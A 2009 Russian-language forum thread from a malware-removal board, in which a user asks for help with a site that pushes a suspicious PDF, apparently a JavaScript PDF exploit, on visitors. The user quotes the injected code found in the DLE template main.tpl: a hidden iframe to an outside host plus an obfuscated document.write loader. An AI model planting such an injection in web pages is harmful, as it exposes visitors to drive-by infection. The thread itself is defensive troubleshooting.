Компьютерный форум OSzone.net  

Компьютерный форум OSzone.net (http://forum.oszone.net/index.php)
-   Лечение систем от вредоносных программ (http://forum.oszone.net/forumdisplay.php?f=87)
-   -   Наверно вирус или троян на сайте (http://forum.oszone.net/showthread.php?t=151176)

AACC 22-09-2009 14:30 1224730
Наверно вирус или троян на сайте
 
Добрый день!

хотел с вами посоветоваться...

у знакомого есть есть сайт

при заходе на сайте менеджер закачек пытается сразу сам загрузить вот этот файл
Код:
http://liveinternetru.net/stat/ethicsIpsum.pdf
(осторожно может это вирус)

кто может проверить что это за файл

и что мне посоветовать админу того сайта, где искать этот вредный скрипт который вызывает загрузку файла?
(сайт работает на движке ДЛЕ)

okshef 22-09-2009 15:46 1224790
Результат проверки на Virustotal.com Файл открылся - ничего особенного - эмблема FireFox

CyberDaemon 22-09-2009 15:58 1224797
Цитата:
Цитата okshef
Файл открылся - ничего особенного »
А Exploit.PDF-JS.Gen не сработал? ;)
Зачем сайт старательно пытается этот PDF втюхать?

okshef 22-09-2009 16:10 1224804
А как он должен был сработать? Единственное, на что обратил внимание - задержка при открытии. Буду благодарен за пояснения, но в Гугл посылать не надо :)

P.S. Отправил на анализ в ESET

akok 22-09-2009 16:45 1224832
AACC, а сайт куда дели?

To change this page, upload your website into the public_html directory

okshef, надеюсь на виртуалке открывал? :)

liveinternetru.net/stat - тут три скрипта загрузчика.

http://www.virustotal.com/ru/analisi...a25-1253623057

Кстати по одному и тому же IP скачивать не дает больше одного раза.

Все(включая раскладку по сайту) уплывает в еще несколько вирлабов.

AACC 23-09-2009 00:27 1225147
Цитата:
Цитата akok
AACC, а сайт куда дели? »
не хотел его рекламировать :)

Цитата:
по одному и тому же IP скачивать не дает больше одного раза.
верно, я тоже это заметил

оказывается код лежал перед </body> в файле main.tpl

Код:
<iframe src = "http://liveinternetru.net/stat/index.php" width=1 height=1 style="visibility:hidden">
<textarea id=GhLzcEK style="display:none">%3Ciframe src %3D %22http%3A%2F%2Fliveinternetru.net%2Fstat%2Findex.php%22 width%3D1 height%3D1 style%3D%22visibility%3Ahidden%22%3E</textarea><script>function KHCSXGjE(jEddBy){ fff=op.split("66");alert('FGpjimOxT'); }
var BMKbDt=document;document['wr1ite'.replace(/[0-9]/,'')](unescape(document.getElementById('GhLzcEK').value));function VszbxFSJ(LWznyDzk){ fff.op.replace("v");var fApzn=new Function("QiZ", "return 912451;"); }
</script>

вопрос, как можно такое засунуть? и как нужно от такого предохранять сайт?

akok 23-09-2009 13:45 1225499
AACC, получив пароли от админа или хостера.


Время: 20:42.

Время: 20:42.
© OSzone.net 2001-